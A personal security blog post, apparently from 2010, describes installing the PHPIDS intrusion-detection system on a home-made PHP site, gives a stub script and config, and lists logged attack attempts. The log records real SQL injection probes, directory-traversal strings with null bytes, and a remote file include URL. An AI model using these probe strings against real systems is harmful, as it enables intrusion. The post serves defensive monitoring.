Sponsored by:
Affiliates:
















Irongeek's Featured Links:
Web Hosting
Web Hosting
Free Web Hosting hosting
Keylogger
Document Scanning
Free Domain Names
Notebooks
Recover Data
Free Antivirus
hosted exchange 2007
EC-Council ECSA Training Videos
Web Hosting:
Help Irongeek.com pay for bandwidth and research equipment:
|
PHPIDS Installation and Test Page
PHPIDS Installation and Test Page
Since my page is mostly a home grown ghetto PHP CMS, I was interested in seeing
what sort of attacks were being thrown against it. I found a project online
Called PHPIDS, and here are my notes on installing it along with a list of
recent attacks as reported by the IDS.
1. First, download the PHPIDS from
http://php-ids.org/downloads/ and extract it.
2. I uploaded everything in the directory lib and below to my web folder.
3. I'm a noob when it comes to MySQL, so I set up a new database in MySQL using
the PHPMyAdmin front end. In the file lib\IDS\Log\Database.php you will find how
the DB has to be set up. What it amounted to for me was just creating the needed
table using the SQL command:
CREATE TABLE IF NOT EXISTS `intrusions` ( `id` int(11) unsigned NOT null auto_increment, `name` varchar(128) NOT null, `value` text NOT null, `page` varchar(255) NOT null, `ip` varchar(15) NOT null, `impact` int(11) unsigned NOT null, `origin` varchar(15) NOT null, `created` datetime NOT null, PRIMARY KEY (`id`) ) ENGINE=MyISAM ;
4. By default, the Config.ini file is in \lib\IDS\Config. This is where you need
to set up your database name, password, email address etc. Obviously, you don't
want to leave this someplace where folks can just download it, in my case I
moved it one folder up from the web root where thePHP install could still get to
it (see note about paths in the next section) but a web browser hopefully can
not. I also set mine to ignore some Google cookies by adding this to
the Config.ini:
exceptions[] = __utmz exceptions[] = __utmc exceptions[] = COOKIE.__utmz exceptions[] = COOKIE.__utmc exceptions[] = REQUEST.__utmz exceptions[] = REQUEST.__utmc
5. I then created the following stub file (idsstub.php) to initiate the IDS:
<?php
//Set where the relative IDS directory is (IDS parent folder), no
leading or trailing slashes. Change this PATH.
$IDSLoc=
"lib";
set_include_path(
get_include_path()
.
PATH_SEPARATOR
.
$IDSLoc
.
'/'
);
/*
if (!session_id()) {
session_start();
}
*/
//Make sure the line below is set to the right path. Change this
PATH.
require_once
$IDSLoc
.
'/IDS/Init.php';
try {
$request
=
array(
'REQUEST'
=>
$_REQUEST,
'GET'
=>
$_GET,
'POST'
=>
$_POST,
'COOKIE'
=>
$_COOKIE,
'SERVER'
=>
$_SERVER["HTTP_HOST"],
//Uncomment the next line if you want to check the user agent, but you
may get a lot of false positives
//'USERAGENT'
=> $_SERVER["HTTP_USER_AGENT"],
'ACCEPT'
=>
$_SERVER["HTTP_ACCEPT
"]
);
//By
default, the config is in an insecure place where it can be downloaded,
I moved it one directory up from my root web folder. Change this PATH.
$init
= IDS_Init::init('/home/.giga/irongeek/Config.ini');
$init->config['General']['base_path']
= dirname(__FILE__)
.
'/'
.
$IDSLoc
.
'/IDS/';
$init->config['General']['use_base_path']
=
true;
$init->config['Caching']['caching']
=
'none';
$ids
=
new
IDS_Monitor($request,
$init);
$result
=
$ids->run();
if
(!$result->isEmpty())
{
//echo
$result
?>
<div
style="position:fixed;
right:180px; bottom:10px; overflow:visible;"
id="clippy">
<table
valign="top"
width="130"
height="309"
border="0"
background="http://www.irongeek.com/images/clippy.png"
cellpadding="10">
<tr><td
valign="top"><font
size="1">
Hello, according to
<a
href="http://php-ids.org/">PHPIDS</a>
it looks like you are trying to pwn my site.
Would you like <a
href="http://www.irongeek.com/i.php?page=videos/owasp-top-5-louisville">some
help with that?</a>
</font></td></tr>
</table>
</div>
<?
require_once
'IDS/Log/File.php';
require_once
'IDS/Log/Composite.php';
$compositeLog
=
new
IDS_Log_Composite();
$compositeLog->addLogger(IDS_Log_File::getInstance($init));
require_once
'IDS/Log/Email.php';
require_once
'IDS/Log/Database.php';
$compositeLog->addLogger(
IDS_Log_Email::getInstance($init),
IDS_Log_Database::getInstance($init)
);
$compositeLog->execute($result);
}
else
{
echo
'Alls good, in the hood.';
}
} catch (Exception
$e)
{
printf(
'An error occured: %s',
$e->getMessage()
);
}
?>
|
Things you will want to note: There are several places where you will need to
change your path so it knows where the files are. I've noted them in the code
above with the comment "Change this PATH." Setting the right paths is
the biggest pain, and sorry, but I can't help you on your personal install. Also, make sure you point the config
file to wherever you put Config.ini . I've also changed some of the user
submitted data that the IDS checks. Folks can possibly slip in attacks via the
HTTP ACCEPT for USER AGENT header fields. I had to comment out my user agent
check as it caused too many false positive. On mine, I set it to pop up an image
like the following if folks try to attack my site:

It's fun to be a wiseass to attackers. All hail Clippy!!!
6. On every page I wanted to track attacks, I added the following line of PHP: include ("idsstub.php"); In my case, I just put it in my footer.
7. That's pretty much it. Check out my log below of the last 2000 detected
attacks, mostly it's folks trying RFI (remote file includes):
| ID: | 123397 | | Name: | REQUEST.a | | Value: | or1=1-- | | Page: | /?a=or1=1-- | | IP: | 67.195.111.36 | | Impact: | 6 | | Created: | 2010-05-04 08:41:46 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123398 | | Name: | GET.a | | Value: | or1=1-- | | Page: | /?a=or1=1-- | | IP: | 67.195.111.36 | | Impact: | 6 | | Created: | 2010-05-04 08:41:46 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123395 | | Name: | REQUEST.a | | Value: | or1=1-- | | Page: | /?a=or1=1-- | | IP: | 67.195.111.36 | | Impact: | 6 | | Created: | 2010-05-04 08:40:15 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123396 | | Name: | GET.a | | Value: | or1=1-- | | Page: | /?a=or1=1-- | | IP: | 67.195.111.36 | | Impact: | 6 | | Created: | 2010-05-04 08:40:15 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123393 | | Name: | REQUEST.a | | Value: | or1=1-- | | Page: | /?a=or1=1-- | | IP: | 67.195.111.36 | | Impact: | 6 | | Created: | 2010-05-04 08:39:54 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123394 | | Name: | GET.a | | Value: | or1=1-- | | Page: | /?a=or1=1-- | | IP: | 67.195.111.36 | | Impact: | 6 | | Created: | 2010-05-04 08:39:54 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123391 | | Name: | REQUEST.a | | Value: | or1=1-- | | Page: | /?a=or1=1-- | | IP: | 67.195.111.36 | | Impact: | 6 | | Created: | 2010-05-04 08:39:33 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123392 | | Name: | GET.a | | Value: | or1=1-- | | Page: | /?a=or1=1-- | | IP: | 67.195.111.36 | | Impact: | 6 | | Created: | 2010-05-04 08:39:33 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123389 | | Name: | REQUEST.a | | Value: | or1=1-- | | Page: | /?a=or1=1-- | | IP: | 67.195.111.36 | | Impact: | 6 | | Created: | 2010-05-04 08:39:13 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123390 | | Name: | GET.a | | Value: | or1=1-- | | Page: | /?a=or1=1-- | | IP: | 67.195.111.36 | | Impact: | 6 | | Created: | 2010-05-04 08:39:13 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123387 | | Name: | REQUEST.a | | Value: | or1=1-- | | Page: | /?a=or1=1-- | | IP: | 67.195.111.36 | | Impact: | 6 | | Created: | 2010-05-04 08:38:07 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123388 | | Name: | GET.a | | Value: | or1=1-- | | Page: | /?a=or1=1-- | | IP: | 67.195.111.36 | | Impact: | 6 | | Created: | 2010-05-04 08:38:07 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123385 | | Name: | REQUEST.BCSI-AC-4E050338BC5CF7E7 | | Value: | 1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA= | | Page: | / | | IP: | 170.167.4.200 | | Impact: | 22 | | Created: | 2010-05-04 07:10:48 | | Details: | Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.0769230769231 Converted: ((++:
|
| ID: | 123386 | | Name: | COOKIE.BCSI-AC-4E050338BC5CF7E7 | | Value: | 1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA= | | Page: | / | | IP: | 170.167.4.200 | | Impact: | 22 | | Created: | 2010-05-04 07:10:48 | | Details: | Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.0769230769231 Converted: ((++:
|
| ID: | 123383 | | Name: | REQUEST.page | | Value: | http://0x0134.lan.io/pb.php? | | Page: | /i.php?page=http://0x0134.lan.io/pb.php? | | IP: | 213.211.230.78 | | Impact: | 10 | | Created: | 2010-05-04 06:07:37 | | Details: | Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39
|
| ID: | 123384 | | Name: | GET.page | | Value: | http://0x0134.lan.io/pb.php? | | Page: | /i.php?page=http://0x0134.lan.io/pb.php? | | IP: | 213.211.230.78 | | Impact: | 10 | | Created: | 2010-05-04 06:07:37 | | Details: | Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39
|
| ID: | 123382 | | Name: | GET.page | | Value: | security/ipinfo and 0=1 union select | | Page: | /i.php?page=security/ipinfo+and+0=1+union+select+ | | IP: | 188.24.59.148 | | Impact: | 20 | | Created: | 2010-05-04 05:47:39 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55
|
| ID: | 123381 | | Name: | REQUEST.page | | Value: | security/ipinfo and 0=1 union select | | Page: | /i.php?page=security/ipinfo+and+0=1+union+select+ | | IP: | 188.24.59.148 | | Impact: | 20 | | Created: | 2010-05-04 05:47:38 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55
|
| ID: | 123379 | | Name: | REQUEST.page | | Value: | security/ipinfo and 0=1 union select | | Page: | /i.php?page=security/ipinfo+and+0=1+union+select+ | | IP: | 188.24.59.148 | | Impact: | 20 | | Created: | 2010-05-04 05:40:02 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55
|
| ID: | 123380 | | Name: | GET.page | | Value: | security/ipinfo and 0=1 union select | | Page: | /i.php?page=security/ipinfo+and+0=1+union+select+ | | IP: | 188.24.59.148 | | Impact: | 20 | | Created: | 2010-05-04 05:40:02 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55
|
| ID: | 123377 | | Name: | REQUEST.page | | Value: | security/networkprinterhacking' and 1=2 and ''=' | | Page: | /i.php?page=security/networkprinterhacking'%20and%201=2%20and%20''=' | | IP: | 222.36.118.28 | | Impact: | 46 | | Created: | 2010-05-04 03:31:41 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44 Description: Detects chained SQL injection attempts 2/2 | Tags: sqli, id | ID: 49
|
| ID: | 123378 | | Name: | GET.page | | Value: | security/networkprinterhacking' and 1=2 and ''=' | | Page: | /i.php?page=security/networkprinterhacking'%20and%201=2%20and%20''=' | | IP: | 222.36.118.28 | | Impact: | 46 | | Created: | 2010-05-04 03:31:41 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44 Description: Detects chained SQL injection attempts 2/2 | Tags: sqli, id | ID: 49
|
| ID: | 123375 | | Name: | REQUEST.page | | Value: | security/networkprinterhacking' and 1=1 and ''=' | | Page: | /i.php?page=security/networkprinterhacking'%20and%201=1%20and%20''=' | | IP: | 222.36.118.28 | | Impact: | 46 | | Created: | 2010-05-04 03:30:33 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44 Description: Detects chained SQL injection attempts 2/2 | Tags: sqli, id | ID: 49
|
| ID: | 123376 | | Name: | GET.page | | Value: | security/networkprinterhacking' and 1=1 and ''=' | | Page: | /i.php?page=security/networkprinterhacking'%20and%201=1%20and%20''=' | | IP: | 222.36.118.28 | | Impact: | 46 | | Created: | 2010-05-04 03:30:33 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44 Description: Detects chained SQL injection attempts 2/2 | Tags: sqli, id | ID: 49
|
| ID: | 123373 | | Name: | REQUEST.task | | Value: | ../../../../../../../../../../../../../../../proc/self/MILDNet | | Page: | /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/MILDNet%00 | | IP: | 89.108.70.47 | | Impact: | 30 | | Created: | 2010-05-04 01:11:27 | | Details: | Description: Detects basic directory traversal | Tags: dt, id, lfi | ID: 10 Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11 Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39
|
| ID: | 123374 | | Name: | GET.task | | Value: | ../../../../../../../../../../../../../../../proc/self/MILDNet | | Page: | /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/MILDNet%00 | | IP: | 89.108.70.47 | | Impact: | 30 | | Created: | 2010-05-04 01:11:27 | | Details: | Description: Detects basic directory traversal | Tags: dt, id, lfi | ID: 10 Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11 Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39
|
| ID: | 123371 | | Name: | REQUEST.task | | Value: | ../../../../../../../../../../../../../../../proc/self/MILDNet | | Page: | /security-podcasts.php/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/MILDNet%00 | | IP: | 89.108.70.47 | | Impact: | 30 | | Created: | 2010-05-04 01:11:25 | | Details: | Description: Detects basic directory traversal | Tags: dt, id, lfi | ID: 10 Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11 Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39
|
| ID: | 123372 | | Name: | GET.task | | Value: | ../../../../../../../../../../../../../../../proc/self/MILDNet | | Page: | /security-podcasts.php/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/MILDNet%00 | | IP: | 89.108.70.47 | | Impact: | 30 | | Created: | 2010-05-04 01:11:25 | | Details: | Description: Detects basic directory traversal | Tags: dt, id, lfi | ID: 10 Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11 Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39
|
| ID: | 123369 | | Name: | REQUEST.task | | Value: | ../../../../../../../../../../../../../../../proc/self/MILDNet | | Page: | /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/MILDNet%00 | | IP: | 89.108.70.47 | | Impact: | 30 | | Created: | 2010-05-04 00:38:55 | | Details: | Description: Detects basic directory traversal | Tags: dt, id, lfi | ID: 10 Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11 Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39
|
| ID: | 123370 | | Name: | GET.task | | Value: | ../../../../../../../../../../../../../../../proc/self/MILDNet | | Page: | /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/MILDNet%00 | | IP: | 89.108.70.47 | | Impact: | 30 | | Created: | 2010-05-04 00:38:55 | | Details: | Description: Detects basic directory traversal | Tags: dt, id, lfi | ID: 10 Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11 Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39
|
| ID: | 123367 | | Name: | REQUEST.task | | Value: | ../../../../../../../../../../../../../../../proc/self/MILDNet | | Page: | /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/MILDNet%00 | | IP: | 89.108.70.47 | | Impact: | 30 | | Created: | 2010-05-04 00:34:05 | | Details: | Description: Detects basic directory traversal | Tags: dt, id, lfi | ID: 10 Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11 Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39
|
| ID: | 123368 | | Name: | GET.task | | Value: | ../../../../../../../../../../../../../../../proc/self/MILDNet | | Page: | /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/MILDNet%00 | | IP: | 89.108.70.47 | | Impact: | 30 | | Created: | 2010-05-04 00:34:05 | | Details: | Description: Detects basic directory traversal | Tags: dt, id, lfi | ID: 10 Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11 Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39
|
| ID: | 123365 | | Name: | REQUEST.page | | Value: | security/ps2-and-usb-hardware-keyloggers-3-keyllama and 0=1 union select | | Page: | /i.php?page=security/ps2-and-usb-hardware-keyloggers-3-keyllama+and+0=1+union+select+ | | IP: | 123.26.81.33 | | Impact: | 20 | | Created: | 2010-05-03 23:21:10 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55
|
| ID: | 123366 | | Name: | GET.page | | Value: | security/ps2-and-usb-hardware-keyloggers-3-keyllama and 0=1 union select | | Page: | /i.php?page=security/ps2-and-usb-hardware-keyloggers-3-keyllama+and+0=1+union+select+ | | IP: | 123.26.81.33 | | Impact: | 20 | | Created: | 2010-05-03 23:21:10 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55
|
| ID: | 123363 | | Name: | REQUEST.page | | Value: | security/usb-hardware-keyloggers-1-keycarbon and 0=1 union select | | Page: | /i.php?page=security/usb-hardware-keyloggers-1-keycarbon+and+0=1+union+select+ | | IP: | 123.26.81.33 | | Impact: | 20 | | Created: | 2010-05-03 23:21:08 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55
|
| ID: | 123364 | | Name: | GET.page | | Value: | security/usb-hardware-keyloggers-1-keycarbon and 0=1 union select | | Page: | /i.php?page=security/usb-hardware-keyloggers-1-keycarbon+and+0=1+union+select+ | | IP: | 123.26.81.33 | | Impact: | 20 | | Created: | 2010-05-03 23:21:08 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55
|
| ID: | 123361 | | Name: | REQUEST.page | | Value: | security/ps2-and-usb-hardware-keyloggers-3-keyllama and 0=1 union select | | Page: | /i.php?page=security/ps2-and-usb-hardware-keyloggers-3-keyllama+and+0=1+union+select+ | | IP: | 123.26.81.33 | | Impact: | 20 | | Created: | 2010-05-03 23:19:44 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55
|
| ID: | 123362 | | Name: | GET.page | | Value: | security/ps2-and-usb-hardware-keyloggers-3-keyllama and 0=1 union select | | Page: | /i.php?page=security/ps2-and-usb-hardware-keyloggers-3-keyllama+and+0=1+union+select+ | | IP: | 123.26.81.33 | | Impact: | 20 | | Created: | 2010-05-03 23:19:44 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55
|
| ID: | 123359 | | Name: | REQUEST.page | | Value: | security/usb-hardware-keyloggers-1-keycarbon and 0=1 union select | | Page: | /i.php?page=security/usb-hardware-keyloggers-1-keycarbon+and+0=1+union+select+ | | IP: | 123.26.81.33 | | Impact: | 20 | | Created: | 2010-05-03 23:19:38 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55
|
| ID: | 123360 | | Name: | GET.page | | Value: | security/usb-hardware-keyloggers-1-keycarbon and 0=1 union select | | Page: | /i.php?page=security/usb-hardware-keyloggers-1-keycarbon+and+0=1+union+select+ | | IP: | 123.26.81.33 | | Impact: | 20 | | Created: | 2010-05-03 23:19:38 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55
|
| ID: | 123357 | | Name: | REQUEST.show | | Value: | ../../../../../../../../../../../../../../../proc/self/MILDNet | | Page: | //index.php?module=admin&show=../../../../../../../../../../../../../../../proc/self/MILDNet%00 | | IP: | 89.108.70.47 | | Impact: | 30 | | Created: | 2010-05-03 21:38:08 | | Details: | Description: Detects basic directory traversal | Tags: dt, id, lfi | ID: 10 Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11 Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39
|
| ID: | 123358 | | Name: | GET.show | | Value: | ../../../../../../../../../../../../../../../proc/self/MILDNet | | Page: | //index.php?module=admin&show=../../../../../../../../../../../../../../../proc/self/MILDNet%00 | | IP: | 89.108.70.47 | | Impact: | 30 | | Created: | 2010-05-03 21:38:08 | | Details: | Description: Detects basic directory traversal | Tags: dt, id, lfi | ID: 10 Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11 Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39
|
| ID: | 123355 | | Name: | REQUEST.page | | Value: | zaurusmain?lastverified=07-MAR-2004 | | Page: | /i.php?submenu=zaurusheader&page=zaurusmain?lastverified=07-MAR-2004 | | IP: | 67.195.111.36 | | Impact: | 10 | | Created: | 2010-05-03 19:46:37 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
|
| ID: | 123356 | | Name: | GET.page | | Value: | zaurusmain?lastverified=07-MAR-2004 | | Page: | /i.php?submenu=zaurusheader&page=zaurusmain?lastverified=07-MAR-2004 | | IP: | 67.195.111.36 | | Impact: | 10 | | Created: | 2010-05-03 19:46:37 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
|
| ID: | 123353 | | Name: | REQUEST.page | | Value: | security/hackingillustrated/i.php?page=videos/myslax | | Page: | /i.php?page=security/hackingillustrated/i.php?page=videos/myslax | | IP: | 96.31.86.184 | | Impact: | 10 | | Created: | 2010-05-03 19:13:13 | | Details: | Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24
|
| ID: | 123354 | | Name: | GET.page | | Value: | security/hackingillustrated/i.php?page=videos/myslax | | Page: | /i.php?page=security/hackingillustrated/i.php?page=videos/myslax | | IP: | 96.31.86.184 | | Impact: | 10 | | Created: | 2010-05-03 19:13:13 | | Details: | Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24
|
| ID: | 123351 | | Name: | REQUEST.page | | Value: | %00 | | Page: | /i.php?page=%2500&mode=print | | IP: | 67.195.111.36 | | Impact: | 10 | | Created: | 2010-05-03 16:43:50 | | Details: | Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39
|
| ID: | 123352 | | Name: | GET.page | | Value: | %00 | | Page: | /i.php?page=%2500&mode=print | | IP: | 67.195.111.36 | | Impact: | 10 | | Created: | 2010-05-03 16:43:50 | | Details: | Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39
|
| ID: | 123349 | | Name: | REQUEST.page | | Value: | '' | | Page: | /i.php?page='' | | IP: | 208.80.193.39 | | Impact: | 12 | | Created: | 2010-05-03 13:04:28 | | Details: | Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
|
| ID: | 123350 | | Name: | GET.page | | Value: | '' | | Page: | /i.php?page='' | | IP: | 208.80.193.39 | | Impact: | 12 | | Created: | 2010-05-03 13:04:28 | | Details: | Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
|
| ID: | 123347 | | Name: | REQUEST.page | | Value: | suckmydick.php security/madmacs-mac-spoofer | | Page: | /i.php?page=suckmydick.php%00security/madmacs-mac-spoofer | | IP: | 202.152.243.139 | | Impact: | 10 | | Created: | 2010-05-03 09:25:22 | | Details: | Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39
|
| ID: | 123348 | | Name: | GET.page | | Value: | suckmydick.php security/madmacs-mac-spoofer | | Page: | /i.php?page=suckmydick.php%00security/madmacs-mac-spoofer | | IP: | 202.152.243.139 | | Impact: | 10 | | Created: | 2010-05-03 09:25:22 | | Details: | Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39
|
| ID: | 123345 | | Name: | REQUEST.page | | Value: | security/ps2 and 0=1 union select -and-usb-hardware-keyloggers-3-keyllama | | Page: | /i.php?page=security/ps2+and+0=1+union+select+-and-usb-hardware-keyloggers-3-keyllama | | IP: | 118.71.149.247 | | Impact: | 20 | | Created: | 2010-05-03 08:59:47 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55
|
| ID: | 123346 | | Name: | GET.page | | Value: | security/ps2 and 0=1 union select -and-usb-hardware-keyloggers-3-keyllama | | Page: | /i.php?page=security/ps2+and+0=1+union+select+-and-usb-hardware-keyloggers-3-keyllama | | IP: | 118.71.149.247 | | Impact: | 20 | | Created: | 2010-05-03 08:59:47 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55
|
| ID: | 123343 | | Name: | REQUEST.bcsi-ac-C79501543DEBC235 | | Value: | 1AD20D21000000054Dt4IkDDjTJfqvEIK5xS62KBT90oAAAABQAAAFmpJQCAcAAAAgAAAP0GAQA= | | Page: | /?bcsi-ac-C79501543DEBC235=1AD20D21000000054Dt4IkDDjTJfqvEIK5xS62KBT90oAAAABQAAAFmpJQCAcAAAAgAAAP0GAQA= | | IP: | 74.86.107.156 | | Impact: | 28 | | Created: | 2010-05-03 07:12:48 | | Details: | Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 2.1666666666667 Converted: (((++:
|
| ID: | 123344 | | Name: | GET.bcsi-ac-C79501543DEBC235 | | Value: | 1AD20D21000000054Dt4IkDDjTJfqvEIK5xS62KBT90oAAAABQAAAFmpJQCAcAAAAgAAAP0GAQA= | | Page: | /?bcsi-ac-C79501543DEBC235=1AD20D21000000054Dt4IkDDjTJfqvEIK5xS62KBT90oAAAABQAAAFmpJQCAcAAAAgAAAP0GAQA= | | IP: | 74.86.107.156 | | Impact: | 28 | | Created: | 2010-05-03 07:12:48 | | Details: | Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 2.1666666666667 Converted: (((++:
|
| ID: | 123341 | | Name: | REQUEST.BCSI-AC-4E050338BC5CF7E7 | | Value: | 1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA= | | Page: | / | | IP: | 170.167.4.200 | | Impact: | 22 | | Created: | 2010-05-03 07:12:44 | | Details: | Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.0769230769231 Converted: ((++:
|
